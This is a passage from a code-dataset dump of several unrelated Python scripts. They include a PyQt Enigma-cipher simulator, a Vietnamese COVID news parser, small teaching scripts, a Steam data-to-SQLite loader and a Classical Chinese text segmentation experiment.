AddAlphabetDialogue):\n def __init__(self, mainwindow):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n self.buttonBox.accepted.connect(self.accept_alphabet)\n self.buttonBox.rejected.connect(self.reject_alphabet)\n\n # Добавление нового алфавита\n\n def accept_alphabet(self):\n name = self.lineEdit.text()\n alphabet = self.lineEdit_2.text()\n self.mainwindow.add_alphabet(name, alphabet)\n self.close()\n\n def reject_alphabet(self):\n self.close()\n\n\n# Класс диалогового окна настройки ротора\n\nclass DialogWindowChangeRotor(QDialog, RotorChangeDialogue):\n def __init__(self, mainwindow, rotor, number):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n a, b, c = rotor\n self.lineEdit_perms.setText(a)\n self.lineEdit_turnover.setText(b)\n self.lineEdit_ring_set.setText(c)\n self.number = number\n\n self.pshb_Random_rotor.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_rotor)\n self.buttonBox.rejected.connect(self.reject_rotor)\n\n def random(self):\n a, b, c = random_rotor()\n self.lineEdit_perms.setText(a)\n self.lineEdit_turnover.setText(b)\n self.lineEdit_ring_set.setText(c)\n\n def accept_rotor(self):\n rotor = self.lineEdit_perms.text(), self.lineEdit_turnover.text(), self.lineEdit_ring_set.text()\n self.mainwindow.rotors[self.number] = rotor\n self.close()\n\n def reject_rotor(self):\n self.close()\n\n\n# Класс диалогового окна настройки рефлектора\n\nclass DialogWindowChangeReflector(QDialog, ReflectorChangeDialogue):\n def __init__(self, mainwindow, reflector):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n self.lineEdit_Reflector.setText(reflector)\n\n self.pshb_Random_reflector.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_reflector)\n self.buttonBox.rejected.connect(self.reject_reflector)\n\n def random(self):\n self.lineEdit_Reflector.setText(create_reflector())\n\n def accept_reflector(self):\n self.mainwindow.reflector = self.lineEdit_Reflector.text()\n self.close()\n\n def reject_reflector(self):\n self.close()\n\n\n# Класс диалогового окна настройки коммутационной панели\n\nclass DialogWindowChangePlug(QDialog, PlugChangeDialogue):\n def __init__(self, mainwindow, plug_board):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n\n reader = plug_board\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setRowCount(0)\n for i, row in enumerate(reader):\n self.tableWidget.setRowCount(self.tableWidget.rowCount() + 1)\n for j, elem in enumerate(row):\n self.tableWidget.setItem(i, j, QTableWidgetItem(elem))\n\n self.pshb_Random.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_reflector)\n self.buttonBox.rejected.connect(self.reject_reflector)\n\n def random(self):\n reader = create_plug_board(self.mainwindow.len_plug_board)\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setRowCount(0)\n for i, row in enumerate(reader):\n self.tableWidget.setRowCount(self.tableWidget.rowCount() + 1)\n for j, elem in enumerate(row):\n self.tableWidget.setItem(i, j, QTableWidgetItem(elem))\n\n def accept_reflector(self):\n out = []\n for i in range(self.tableWidget.rowCount()):\n row = []\n for j in range(self.tableWidget.columnCount()):\n item = self.tableWidget.item(i, j)\n if item is not None:\n row.append(item.text())\n out.append(tuple(row))\n self.mainwindow.plug_board = out\n self.close()\n\n def reject_reflector(self):\n self.close()\n\n\n# Класс диалогового окна справки\n\nclass 
DialogWindowHelp(QDialog, HelpDialogue):\n def __init__(self):\n QDialog.__init__(self)\n self.setupUi(self)\n self.pushButton.clicked.connect(self.exit)\n\n def exit(self):\n self.close()\n\n\n# Основное окно программы\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.fname = 'untitled.txt'\n self.saved = False\n self.Open_Conf_Enable = True\n self.used_alphabets = ['Английский']\n self.alphabets = {\n 'Русский': 'АБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ',\n 'Английский': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n }\n self.len_plug_board = 0\n self.create_elements()\n\n # Меню файл\n\n self.action_Create.triggered.connect(self.create_file)\n self.action_Open.triggered.connect(self.open_file)\n self.action_Save.triggered.connect(self.save_file)\n self.action_Save_as.triggered.connect(self.save_as_file)\n self.action_Exit.triggered.connect(self.exit_from_app)\n\n # Меню конфигурация\n\n self.action_Rotor1_change.triggered.connect(self.rotor1_change)\n self.action_Rotor2_change.triggered.connect(self.rotor2_change)\n self.action_Rotor3_change.triggered.connect(self.rotor3_change)\n self.action_Reflector_change.triggered.connect(self.reflector_change)\n self.action_Q_plug_board.triggered.connect(self.q_plug_change)\n self.action_Change_plug_board.triggered.connect(self.plug_change)\n self.action_Conf_open.triggered.connect(self.conf_open)\n self.action_Conf_save.triggered.connect(self.conf_save)\n\n # Меню алфавиты\n\n self.action_Choose_alphabet.triggered.connect(self.choose_alphabet)\n self.action_Add_alphabet.triggered.connect(self.add_alphabet_dial)\n\n # Вызов справки\n\n self.action_Help.triggered.connect(self.help)\n\n # Шифрование\n\n self.textEdit.textChanged.connect(self.encrypt)\n\n # Работа с файлами\n\n def create_file(self):\n self.saved = False\n self.fname = 'untitled.txt'\n self.textEdit.setText('')\n\n def open_file(self):\n self.saved = False\n self.fname = QFileDialog.getOpenFileName(self, 'Выберите текстовый документ (.txt)', '')[0]\n if self.fname == '':\n self.fname = 'untitled.txt'\n return\n try:\n with open(self.fname, 'rt') as f:\n text = f.read()\n self.textEdit.setText(text)\n self.label_Status.setText('')\n except:\n self.textEdit.setText('')\n self.label_Status.setText('Статус: Error encoding')\n\n def save_file(self):\n if self.saved:\n text = self.Encrypted.toPlainText()\n f = open(self.fname, 'w')\n f.write(text)\n f.close()\n else:\n self.save_as_file()\n\n def save_as_file(self):\n fname = QFileDialog.getSaveFileName(self, 'Сохранить файл', '', 'TXT (*.txt)')[0]\n if fname == '':\n return\n self.fname = fname\n self.saved = True\n text = self.Encrypted.toPlainText()\n f = open(self.fname, 'w')\n f.write(text)\n f.close()\n\n def exit_from_app(self):\n self.close()\n\n # Работа с конфигурацией машины\n\n def rotor1_change(self):\n rotor = self.rotors[0]\n DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 0)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def rotor2_change(self):\n rotor = self.rotors[1]\n DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 1)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def rotor3_change(self):\n rotor = self.rotors[2]\n DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 2)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def reflector_change(self):\n reflector = self.reflector\n DialogWindowChangeReflector_inst = 
DialogWindowChangeReflector(self, reflector)\n DialogWindowChangeReflector_inst.show()\n DialogWindowChangeReflector_inst.exec()\n\n def q_plug_change(self):\n text = f'Текущее число подключений: {self.len_plug_board}'\n i, okBtnPressed = QInputDialog.getText(self, \"Количество подключений\",\n text)\n if okBtnPressed:\n try:\n i = int(i)\n if 1 <= i <= len(alphabet) // 2:\n if i == self.len_plug_board:\n return\n else:\n self.len_plug_board = i\n self.plug_board = create_plug_board(self.len_plug_board)\n else:\n return\n except:\n return\n\n def plug_change(self):\n plug_board = self.plug_board\n DialogWindowChangePlug_inst = DialogWindowChangePlug(self, plug_board)\n DialogWindowChangePlug_inst.show()\n DialogWindowChangePlug_inst.exec()\n\n def conf_open(self):\n global alphabet\n del self.plug_board\n fname = QFileDialog.getOpenFileName(self, 'Открыть файл с конфигурацией', '', 'CSV (*.csv)')[0]\n if fname == '':\n return\n if self.Open_Conf_Enable:\n self.Open_Conf_Enable = False\n self.action_Conf_open.setEnabled(False)\n with open(fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n data = list(reader)\n self.rotors[0] = data[0][1], data[0][2], data[0][3]\n self.rotors[1] = data[1][1], data[1][2], data[1][3]\n self.rotors[2] = data[2][1], data[2][2], data[2][3]\n self.reflector = data[3][1]\n self.len_plug_board = data[4][1]\n try:\n board = data[4][2]\n board = [(board[i * 2], board[i * 2 + 1]) for i in range(0, len(board) // 2)]\n self.plug_board = board\n except:\n self.plug_board = []\n alphabet = data[5][0]\n\n def conf_save(self):\n fname = QFileDialog.getSaveFileName(self, 'Сохранить конфигурацию машины', '', 'CSV (*.csv)')[0]\n if fname == '':\n return\n with open(fname, \"w\", newline=\"\") as file:\n zip = self.plug_board\n zip = [list(i) for i in zip]\n zip = ''.join(sum(zip, []))\n table = [['Rotor 1', self.rotors[0][0], self.rotors[0][1], self.rotors[0][2]],\n ['Rotor 2', self.rotors[1][0], self.rotors[1][1], self.rotors[1][2]],\n ['Rotor 3', self.rotors[2][0], self.rotors[2][1], self.rotors[2][2]],\n ['Reflector', self.reflector],\n ['PlugBoard', self.len_plug_board, zip],\n [alphabet]]\n file.truncate()\n writer = csv.writer(file)\n for row in table:\n writer.writerow(row)\n\n # Работа с алфавитами (на стадии тестирования)\n\n def choose_alphabet(self):\n global alphabet\n alphabets = list(self.alphabets.keys())\n choice = tuple([item for item in alphabets if item not in self.used_alphabets])\n\n i, okBtnPressed = QInputDialog.getItem(self, \"Выбор алфавита\",\n \"Выберите алфавит:\",\n choice,\n 1, False)\n if okBtnPressed:\n alphabet = self.alphabets[i]\n self.used_alphabets.append(i)\n self.create_elements()\n if len(alphabets) == len(self.used_alphabets):\n self.action_Choose_alphabet.setEnabled(False)\n\n def add_alphabet_dial(self):\n DialogWindowAddALphabet_inst = DialogWindowAddAlphabet(self)\n DialogWindowAddALphabet_inst.show()\n DialogWindowAddALphabet_inst.exec()\n\n def add_alphabet(self, name, alphabet):\n if len(alphabet) % 2 == 0 and len(alphabet) != 0:\n self.alphabets[name] = alphabet\n self.action_Choose_alphabet.setEnabled(True)\n else:\n return\n\n # Вызов справки\n\n def help(self):\n DialogWindowHelp_inst = DialogWindowHelp()\n DialogWindowHelp_inst.show()\n DialogWindowHelp_inst.exec()\n\n # Cочетания клавиш\n\n def keyPressEvent(self, event):\n if int(event.modifiers()) == Qt.ControlModifier:\n if event.key() == Qt.Key_S:\n self.save_as_file()\n if event.key() == Qt.Key_O:\n self.open_file()\n\n # Работа с 
машиной\n\n def create_elements(self):\n self.rotors = [random_rotor(), random_rotor(), random_rotor()]\n self.reflector = create_reflector()\n self.plug_board = create_plug_board(self.len_plug_board)\n\n def encrypt(self):\n if self.Open_Conf_Enable:\n self.Open_Conf_Enable = False\n self.action_Conf_open.setEnabled(False)\n self.machine = Machine(self.rotors, self.reflector, self.plug_board)\n text = self.textEdit.toPlainText()\n text = self.machine.encrypt(text)\n self.Encrypted.setText(text)\n del self.machine\n\n\n# Класс ротора машины\n\nclass Rotor:\n perms = []\n turnover_position = ''\n\n def __init__(self, perms, turnover_position, ring_setting):\n self.position = alphabet[0]\n i = alphabet.index(ring_setting)\n perms = perms[i:] + perms[:i]\n self.perms = [c for c in perms]\n self.turnover_position = turnover_position\n\n def set_position(self, position):\n position_change = alphabet.index(position) - alphabet.index(self.position)\n self.position = position\n self.perms = self.perms[position_change:] + self.perms[:position_change]\n\n def turnover(self):\n return True if self.turnover_position == self.position else False\n\n def step(self):\n turnover = self.turnover()\n self.perms = self.perms[1:] + self.perms[:1]\n self.position = alphabet[(alphabet.index(self.position) + 1) % len(alphabet)]\n if turnover:\n return True\n else:\n return False\n\n def encrypt_forward(self, c):\n return self.perms[alphabet.index(c)]\n\n def encrypt_backward(self, c):\n return alphabet[self.perms.index(c)]\n\n\n# Класс рефлектора машины\n\nclass Reflector:\n def __init__(self, pairs):\n self.pairs = {}\n for i, c in enumerate(alphabet):\n self.pairs[c] = pairs[i]\n\n def reflect(self, c):\n return self.pairs[c]\n\n\n# Класс машины\n\nclass Machine:\n rotors = []\n reflector = None\n plug_board = {}\n double_step = False\n\n def __init__(self, rotors, reflector, plug_board):\n self.rotors = [Rotor(rotor[0], rotor[1], rotor[2]) for rotor in rotors]\n self.reflector = Reflector(reflector)\n for pair in plug_board:\n self.plug_board[pair[0]], self.plug_board[pair[1]] = pair[1], pair[0]\n\n def set_rotors(self, positions):\n if len(positions) != len(self.rotors):\n print('Error: rotor settings do not match with number of rotors')\n else:\n [rotor.set_position(positions[i]) for i, rotor in enumerate(self.rotors)]\n return\n\n def encrypt_char(self, c):\n c = self.plug_board[c] if c in self.plug_board else c\n for i, rotor in enumerate(self.rotors[::-1]):\n if i is 0:\n c = rotor.encrypt_forward(c)\n else:\n difference = (alphabet.index(self.rotors[::-1][i - 1].position) - alphabet.index(\n self.rotors[::-1][i].position)) % len(alphabet)\n c = rotor.encrypt_forward(alphabet[alphabet.index(c) - difference])\n c = self.reflector.reflect(c)\n for i, rotor in enumerate(self.rotors):\n if i is 0:\n c = rotor.encrypt_backward(c)\n else:\n difference = (alphabet.index(self.rotors[i - 1].position) - alphabet.index(\n self.rotors[i].position)) % len(alphabet)\n c = rotor.encrypt_backward(alphabet[alphabet.index(c) - difference])\n c = self.plug_board[c] if c in self.plug_board else c\n return c\n\n def status(self):\n return self.rotors[0].position + self.rotors[1].position + self.rotors[2].position\n\n def step(self):\n if self.double_step:\n self.rotors[1].step()\n self.rotors[0].step()\n self.double_step = False\n if self.rotors[2].step():\n self.rotors[1].step()\n if self.rotors[1].turnover():\n self.double_step = True\n\n def encrypt(self, s):\n global alphabet\n out = ''\n for c in s:\n if c.upper() in 
alphabet:\n self.step()\n if c.isupper():\n out += self.encrypt_char(c)\n else:\n c = c.upper()\n out += self.encrypt_char(c).lower()\n else:\n out += c\n return out\n\n\n# получить случайный ротор\n\ndef random_rotor():\n global alphabet\n rotor = list(alphabet)\n turnover_position = random.choice(rotor)\n ring_setting = random.choice(rotor)\n random.shuffle(rotor)\n rotor = ''.join(rotor)\n rotor = (rotor, turnover_position, ring_setting)\n return rotor\n\n\n# получить случайный рефлектор\n\ndef create_reflector():\n global alphabet\n out = ['_'] * len(alphabet)\n\n for i in range(len(out)):\n if out[i] == '_':\n indexes = []\n for j in range(i + 1, len(out)):\n if out[j] == '_':\n indexes.append(j)\n new_index = random.choice(indexes)\n out[i], out[new_index] = alphabet[new_index], alphabet[i]\n else:\n continue\n\n return ''.join(out)\n\n\n# создать коммутационную панель\n\ndef create_plug_board(quantity):\n global alphabet\n try:\n quantity = int(quantity)\n except:\n return False\n if 0 <= quantity <= 13:\n letters = list(alphabet)\n random.shuffle(letters)\n letters = letters[:quantity * 2]\n plug_board = [(letters[i], letters[i + 1]) for i in range(0, quantity * 2, 2)]\n return plug_board\n else:\n return False\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"matv3ys/Easy-Encrypt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21655654405","text":"import regex as re\nimport itertools as iter\nimport sys\nimport csv\nfrom csv import reader\n\n\"\"\"\nprint(\"Nhap du lieu: \\n\")\ninput = sys.stdin.read()\ninput1 = str.splitlines()\n\"\"\"\n\"\"\"\norder = [\"1\",\"2\",\"3\"]\ngender = [\"nam\",\"nữ\",\"nam\",\"nữ\",\"nam\"]\nage = [\"99\",\"101\"]\nfor treble in iter.zip_longest(order, gender, age):\n print(treble)\n\n\"\"\"\nwith open('testfor.csv', 'w+', encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"Thời gian\", \"Trạng thái\", \"Số ca bệnh\",\"Thứ tự ca tử vong\", \"Thứ tự bệnh nhân\", \"Giới tính\", \"Tuổi\",\"Thông tin\"])\n with open('input.csv', 'r', encoding=\"utf-8\") as read_obj:\n csv_reader = reader(read_obj)\n for row in csv_reader:\n r = ','.join(row)\n totp = re.findall(r'^(?:0[0-9]|1[0-9]|2[0-3]):[0-5][0-9]+ +\\d{1,2}\\/\\d{1,2}\\/\\d{4}',r) #thời gian đăng tin\n condition = re.findall(r'(?:MẮC MỚI|TỬ VONG|KHỎI BỆNH|CHỮA KHỎI|DƯƠNG TÍNH)',r) #Tình trạng\n #z = list(map(lambda x: x.lower(),re.findall(r'\\b\\d+ (?=CA BỆNH|CA MẮC|NGƯỜI|TRƯỜNG HỢP|BỆNH NHÂN|CA DƯƠNG TÍNH)',r)))\n status = re.findall(r'\\b\\d+ (?=CA BỆNH|CA MẮC|NGƯỜI|TRƯỜNG HỢP|BỆNH NHÂN|CA DƯƠNG TÍNH)',r)\n condition1 = re.findall(r'(?=(?:THỨ) +(\\d+))\\b',r)\n order = re.findall(r'(?=(?=(?:\\(BN)+(\\d+)\\))|(?=(?:\\(BN) +(\\d+)\\)))',r) #số thứ tự bệnh nhân\n order1 = re.findall(r'(?=(?:\\(BN) +(\\d+)\\))',r)\n sex = re.findall(r'(?:nam|nữ)', r) # giới tính\n age = re.findall(r'(?i)\\b(?=(?:, )(\\d+ tuổi))\\b',r) #tuổi\n info = re.findall(r'(?i)\\b(?:địa chỉ tại|địa chỉ|quốc tịch|ở|quê quán|ngụ tại|địa chỉ ở|tiền sử:|tại)+[ ,:a-zàáãảạâấầẫậăắằẵặơờớởỡợđêếềễểệôốồỗổộùúụủũưừữứửựíìĩỉịỹỷỳýỵ]+[.]',r) #thông tin\n print(order)\n for treble in iter.zip_longest(totp, condition, status, condition1, order, sex, age):#, info):\n with open('testfor.csv', 'w+', encoding=\"utf-8\", newline='') as file:\n 
writer.writerow(treble)","repo_name":"chungtd89/ncov_moh_retrieve","sub_path":"test/enhanced.py","file_name":"enhanced.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2881313288","text":"\nDic ={}\n\nDic[0] =\"zero\"\nDic[1] =\"one\"\nDic[2] =\"two\"\n\n#print(Dic)\n\n#updating dictionary\nDic[1] =\"One\"\nprint(Dic)\n\n#Iterating dictionary\n\nfor num in Dic:\n print(num)\n\nfor num in Dic.values():\n print(num)\n#keys and valuea\nfor num ,val in Dic.items():\n print(num,\":\",val)\n","repo_name":"ajayeluri/Python","sub_path":"DataType_dic.py","file_name":"DataType_dic.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40763203135","text":"import copy\n\n\ndef lucky_draw_combination(n, m, result=None, all_results=None):\n \"\"\"\n 使用函数的递归(嵌套)调用,找出所有可能的中奖者的组合\n :param all_results: 中奖者的所有组合\n :param n: 参与抽奖的人\n :param result: 抽奖结果\n :param m: 中奖的人数\n :return: None\n \"\"\"\n if result is None:\n result = []\n if all_results is None:\n all_results = []\n if len(result) == m:\n # print(result)\n return all_results.append(result)\n for i in range(len(n)):\n # 从剩下的人中,抽出一个人加入结果\n new_result = copy.copy(result)\n new_result.append(n[i])\n # 每人最多只能被抽中一次,当前被抽中的人之后的人,进入下一次抽奖\n rest_n = n[i + 1: len(n)]\n # 递归调用 在剩下的人中继续抽奖\n lucky_draw_combination(rest_n, m, new_result, all_results)\n return all_results\n\n\nif __name__ == \"__main__\":\n total = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # 被抽奖人列表\n m_ = [3, 2, 1] # 三等奖、二等奖、一等奖的个数\n lucky1 = lucky_draw_combination(total, m_[0])\n for k1 in lucky1:\n total2 = copy.copy(total)\n for j1 in k1:\n total2.remove(j1)\n lucky2 = lucky_draw_combination(total2, m_[1])\n for k2 in lucky2:\n total3 = copy.copy(total2)\n for j2 in k2:\n total3.remove(j2)\n lucky3 = lucky_draw_combination(total3, m_[2])\n for k3 in lucky3:\n print(k1, k2, k3)\n","repo_name":"qinggeouye/GeekTime","sub_path":"MathematicProgrammer/08_combination/lesson8_2.py","file_name":"lesson8_2.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"24721821233","text":"from cgi import print_form\r\n\r\n\r\na =1\r\nb=99\r\n #Airthmetic Operators(+,-,/,*)\r\nprint(\"SUM IS \", a+b)\r\nprint(\"SUB IS \", a-b)\r\nprint(\"MUL IS \", a*b)\r\nprint(\"DIV IS \", a/b)\r\n\r\n#Assignment Opeartors(=,+=,-=,/=,*=)\r\nA= 5\r\nA+=1\r\nA-=2\r\nA/=2\r\nA*=5\r\nprint(round(A))\r\n\r\n#Comparison Operators(return boolen (True/False)\r\ni = 22>22\r\ni = 22<22\r\ni = 22==22\r\ni = 22>=22\r\ni = 22<=22\r\ni = 22!=22\r\nprint(i)\r\n \r\n#Logical Operators\r\nbool1 = True\r\nboll2= False\r\nprint(\"THe value of bool1 and bool2 is \",(bool1 and boll2))\r\nprint(\"THe value of bool1 or bool2 is \",(bool1 or boll2))\r\nprint(\"THe value of not boll2 is \",(not boll2))","repo_name":"NipunMagotra/Learning-Python","sub_path":"Learning 1.1/2_operators.py","file_name":"2_operators.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73764052214","text":"from multiprocessing import Pool, Process\nfrom imutils.paths import list_files\nfrom datetime import datetime\nimport sqlite3 as sql\nfrom tqdm import tqdm\nimport json\nimport time\nimport os\n\nROOT_PATH = f'/config/workspace/project/DoveNest/informations'\nJSON_PATH = 
f'{ROOT_PATH}/jsons'\nDB_PATH = f'{ROOT_PATH}/db'\n\nDB_NAME = 'game_informations'\n# DB_NAME = 'test'\nTABLE_NAME = 'games'\n\nload_json = lambda path: json.loads(open(path, 'r').read())\n\nclass _DB:\n \n def __init__(self, db_name, table_name, columns):\n \n self.db_name = db_name\n self.columns = columns\n self.table_name = table_name\n \n self.conn, self.cursor = self.conn_db()\n \n \n def conn_db(self):\n \n conn = sql.connect(f'{DB_PATH}/{self.db_name}.db', timeout = 3600.0)\n cursor = conn.cursor()\n \n return conn, cursor\n \n \n def create_table(self):\n \n query = f'''\n CREATE TABLE IF NOT EXISTS {self.table_name}(\n \n '''\n \n for idx, column in enumerate(self.columns, 1):\n \n name, dtype, is_null = column\n q = f'{name} {dtype}' if is_null == False \\\n else f'{name} {dtype} NOT NULL'\n query += f'\\t{q},\\n' if idx != len(self.columns) \\\n else f'{q})'\n\n self.cursor.execute(query)\n self.conn.commit()\n \n \n def insert_table(self, data_tuple):\n \n q = ''\n for idx, data in enumerate(data_tuple, 1):\n q += '?, ' if idx != len(data_tuple) else '?'\n \n query = f'INSERT INTO {self.table_name} VALUES({q})'\n \n self.cursor.execute(query, data_tuple)\n self.conn.commit()\n \n \n def backup_table(self):\n \n now = datetime.now()\n with self.conn:\n with open(f'{DB_PATH}/{self.db_name}.sql', 'w') as f:\n \n for line in self.conn.iterdump(): f.write('%s\\n' % line)\n print(f'[INFO] [{now}] 테이블 <{self.table_name}> 백업이 완료되었습니다. ')\n\n\ndef save_db(idx, jsons):\n s = time.time()\n\n for json_path in tqdm(jsons):\n \n now = datetime.now()\n try:\n json_data = load_json(json_path)\n appid, name = json_data['steam_appid'], json_data['name']\n DB.insert_table([appid, name, json.dumps(json_data)])\n\n except Exception as e: print(f'[ERR.DB.I-0001] : [{now}] {e}\\n')\n time.sleep(5)\n\n now = datetime.now()\n print(f'[INFO] : [{now}] {idx} DB 저장 완료 ({time.time() - s:,.3f}s)')\n\n\njson_paths = sorted(list_files(JSON_PATH))\nDB = _DB(DB_NAME, TABLE_NAME, [\n ['appid', 'INTEGER', True], \n ['name', 'TEXT', True], \n ['json_data', 'json', True]\n ])\n\nDB.create_table()\nprint(f'[INFO] : [{datetime.now()}]테이블 <{TABLE_NAME}> 생성 완료')\n\n_1st_jobs = json_paths[:len(json_paths) // 4]\n_2nd_jobs = json_paths[len(json_paths) // 4 : len(json_paths) // 2]\n_3rd_jobs = json_paths[len(json_paths) // 2 : 3 * len(json_paths) // 4]\n_4th_jobs = json_paths[3 * len(json_paths) // 4 :]\n\njobs = [_1st_jobs, _2nd_jobs, _3rd_jobs, _4th_jobs]\nstart = time.time()\nprocs = []\n\n\n# print(jobs[0])\nfor idx, job in enumerate(jobs, 1):\n p = Process(target = save_db, args = (idx, job))\n p.start()\n procs.append(p)\n \nfor p in procs: p.join()\n\nnow = datetime.now()\nf'[Done] : [{now}] 수행 시간 : {time.time() - start:,.4f}초'\n\nDB.backup_table()\nDB.conn.close()","repo_name":"EvoDmiK/DoveNest","sub_path":"informations/src/py/json2db.py","file_name":"json2db.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28748460882","text":"# -*- coding: utf8 -*-\nimport sys\nimport glob\nimport util\nimport datetime\nimport random, nltk, math\nimport numpy as np\nfrom nltk.corpus import names\nimport nltk.metrics\nimport collections\nimport crf\nfrom nltk.metrics import *\n\nmaterial = 'data/24s/*'\n#material = \"data/sjw/A05*\"\nsize = 30000 \ntrainportion = 0.9\ndictfile = 'data/vector/24scbow300.txt'\ncrfmethod = \"l2sgd\" # {‘lbfgs’, ‘l2sgd’, ‘ap’, ‘pa’, ‘arow’}\ncharstop = True # True means label attributes to 
previous char\nfeatures = 1 # 1=discrete; 2=vectors; 3=both\nrandom.seed(101)\n\n#宣告指令式\n\"python runcrf.py 'data/sjw/*' 80 data/vector/vectors300.txt 1 1\"\nargs = sys.argv\nif len(args)>1:\n material = args[1]\n size = int(args[2])\n #dictfile = args[3]\n features = int(args[4])\n charstop = int(args[5])\ncut = int(size*trainportion)\n\n#訓練模型名稱\nmodelname = material.replace('/','').replace('*','')+str(size)+str(charstop)+\".m\"\n\nprint (\"Material:\", material)\nprint (\"Size:\", size, \"entries,\", trainportion, \"as training\")\n\nprint (datetime.datetime.now())\n\n# Prepare li: list of random lines\nif features > 1:\n vdict = util.readvec(dictfile)#先處理文本\n print (\"Dict:\", dictfile)\nli = [line for line in util.file_to_lines(glob.glob(material))]#已經切成陣列\nprint(len(li))\nrandom.shuffle(li)#做亂數取樣\nli = li[:size]\n\n\n# Prepare data: list of x(char), y(label) sequences\ndata = []\nalldata = []\nfor line in li:\n x, y = util.line_toseq(line, charstop)\n #print(x)\n #print(y)\n if features == 1: #可以用\n d = crf.x_seq_to_features_discrete(x, charstop), y\n a = crf.x_seq_to_features_discrete(x, charstop)\n for key in range(len(x)):\n alldata.append((a[key],y[key]))\n \n elif features == 2:\n d = crf.x_seq_to_features_vector(x, vdict, charstop), y\n elif features == 3:\n d = crf.x_seq_to_features_both(x, vdict, charstop), y\n \n #data.append(d)\nprint(data[7])\n#traindata = data[:cut]\n#testdata = data[cut:]\ntraindata = alldata[:cut]\ntestdata = alldata[cut:]\n'''\nclassifier = nltk.NaiveBayesClassifier.train(traindata)\n# 通过测试集来估计分类器的准确性\nprint(nltk.classify.accuracy(classifier, testdata))\n# 如果一个人的名字的最后一个字母是‘a’,那么这个人是男还是女\nclassifier.show_most_informative_features(5)\n\nrefsets = collections.defaultdict(set)\ntestsets = collections.defaultdict(set)\n\nfor i, (feats, label) in enumerate(testdata):\n refsets[label].add(i)\n observed = classifier.classify(feats)\n testsets[observed].add(i)\nprint ('S precision:', nltk.precision(refsets['S'], testsets['S']))\nprint ('S recall:', nltk.recall(refsets['S'], testsets['S']))\nprint ('S F-measure:', nltk.f_measure(refsets['S'], testsets['S']))\nprint ('N precision:', nltk.precision(refsets['N'], testsets['N']))\nprint ('N recall:', nltk.recall(refsets['N'], testsets['N']))\nprint ('N F-measure:', nltk.f_measure(refsets['N'], testsets['N']))\n\n'''\n\n'''\ntrainer = pycrfsuite.Trainer()\n#print trainer.params()\nprint(traindata[0])\nfor t in traindata:\n x, y = t\n \n trainer.append(x, y)\n\ntrainer.select(crfmethod)#做訓練\ntrainer.set('max_iterations',100) #測試迴圈\n#trainer.set('delta',0)\nprint (\"!!!!before train\", datetime.datetime.now())\ntrainer.train(modelname)\nprint (\"!!!!after train\", datetime.datetime.now())\n\n\ntagger = pycrfsuite.Tagger()\n#建立訓練模型檔案\ntagger.open(modelname)\ntagger.dump(modelname+\".txt\")\n\nprint (datetime.datetime.now())\nprint (\"Start testing...\")\nresults = []\nwhile testdata:\n x, yref = testdata.pop()\n yout = tagger.tag(x)\n results.append(util.eval(yref, yout, \"S\"))\n\ntp, fp, fn, tn = zip(*results)\ntp, fp, fn, tn = sum(tp), sum(fp), sum(fn), sum(tn)\n\np, r = tp/(tp+fp), tp/(tp+fn)\nprint (\"Total tokens in Test Set:\", tp+fp+fn+tn)\nprint (\"Total S in REF:\", tp+fn)\nprint (\"Total S in OUT:\", tp+fp)\nprint (\"Presicion:\", p)\nprint (\"Recall:\", r)\nprint (\"*******************F1-score:\", 2*p*r/(p+r))\n\n\nprint (datetime.datetime.now())\nprint (\"Start closed testing...\")\nresults = []\nwhile traindata:\n x, yref = traindata.pop()\n yout = tagger.tag(x)\n results.append(util.eval(yref, yout, 
